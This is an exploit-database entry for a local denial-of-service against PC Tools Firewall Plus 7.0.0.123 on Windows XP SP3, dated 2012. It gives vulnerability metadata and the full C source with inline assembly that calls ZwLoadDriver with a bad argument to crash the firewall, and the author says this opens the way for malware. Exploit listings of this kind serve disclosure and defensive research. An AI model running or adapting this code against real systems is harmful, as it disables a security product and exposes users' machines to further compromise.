header-logo
Suggest Exploit
vendor:
Firewall Plus
by:
0in (Maksymilian Motyl)
7.5
CVSS
HIGH
Local Denial of Service
400
CWE
Product Name: Firewall Plus
Affected Version From: 7.0.0.123
Affected Version To: 7.0.0.123
Patch Exists: NO
Related CWE:
CPE: a:pc_tools:firewall_plus:7.0.0.123
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2012

PC Tools Firewall Plus Local DoS

Executing the provided code results in a crash of PC Tools Firewall, allowing for potential malware escalation.

Mitigation:

Update to a patched version of PC Tools Firewall or use an alternative firewall solution.
Source

Exploit-DB raw data:

/* 
Exploit Title: PC Tools Firewall Plus Local DoS
Version: 7.0.0.123
Author: 0in (Maksymilian Motyl)
Software Link: www.pctools.com
Tested on: Windows XP SP3
Vendor was notified 25.06.2012 - No reply
*/

// After executing this small code, PC Tools Firewall crashes so it opens the way to malware escalation
#include "stdafx.h"
#include <Windows.h>
 
int _tmain(int argc, _TCHAR* argv[])
{
	for(int i=0;i<512;i++)
		printf(".");
     _asm
     {
          push 0xffffff
          mov eax,61h ;          ZwLoadDriver 
          mov edx,7FFE0300h ; ntdll.KiFastSystemCall
          call dword ptr ds:[edx]
 
     }
 
 
     return 0;
}

Navigation

Suggest Exploit

Services By CQR